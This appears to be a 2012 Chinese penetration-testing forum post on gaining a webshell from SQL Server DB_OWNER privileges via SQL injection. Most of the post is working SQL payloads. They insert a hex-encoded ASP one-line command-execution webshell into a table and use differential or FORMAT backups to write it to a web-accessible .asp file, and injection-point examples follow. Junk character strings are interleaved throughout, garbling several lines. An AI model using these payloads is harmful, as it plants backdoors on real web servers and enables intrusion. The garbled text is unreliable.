中国网络渗透测试联盟

标题: DB_OWNER权限得到webshell的改进方法 [打印本页]

作者: admin    时间: 2012-12-31 09:57
标题: DB_OWNER权限得到webshell的改进方法
减少备份文件大小,得到可执行的webshell成功率提高不少
4 K/ A6 B$ X1 u
9 E3 ?4 {' q: T+ O. }# l一利用差异备份0 b" R# ~2 E' z  Y7 }& P2 G3 h  `5 d! z
加一个参数WITH DIFFERENTIAL0 U# V1 a& R4 l! \; D% c8 k

+ J3 y6 e0 o& ?) s/ S8 @4 ydeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s) i5 n2 h" H2 g1 ?0 P7 k+ @
create table [dbo].[xiaolu] ([cmd] [image]);
' D* f6 o8 n4 g9 |; [insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)6 W7 k" \7 e" P: A
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
) _* @) _% U7 z! k/ W& d) h' s% {$ E, Z. ^) B$ N$ Y8 K
二利用完全FORMAT
2 S# C  S  z& n加一个参数WITH FROMAT& m. {: p; o- F6 T
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以' A2 r1 Z; E, e# O  Y$ s
3 N* E. Z4 `1 S
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
! V5 C2 y; ~- {create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
8 I; e' k$ l* r# Y& b; r' [declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
8 |3 Z) ~$ }7 w! K6 `5 s. |3 R: L$ M" }" `, S3 v
总的来说就是那么简单几句,下面以备份数据库model为例子
1 G9 [1 s# H1 z5 M- m7 o
% n* y7 x. _( l0 R& D! y( c$ X. S- P( }; Jid=1;use model create table cmd(str image);insert into cmd(str) values (”)
9 L2 K! W# _7 o7 h4 M8 Z8 d. t5 ~
id=1;backup database model to disk=’你的路径‘ with differential,format;–
) |% _; Y* n0 s8 i+ `' F
. X4 k3 L4 \/ ~  g2 Z4 `4 g- H




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2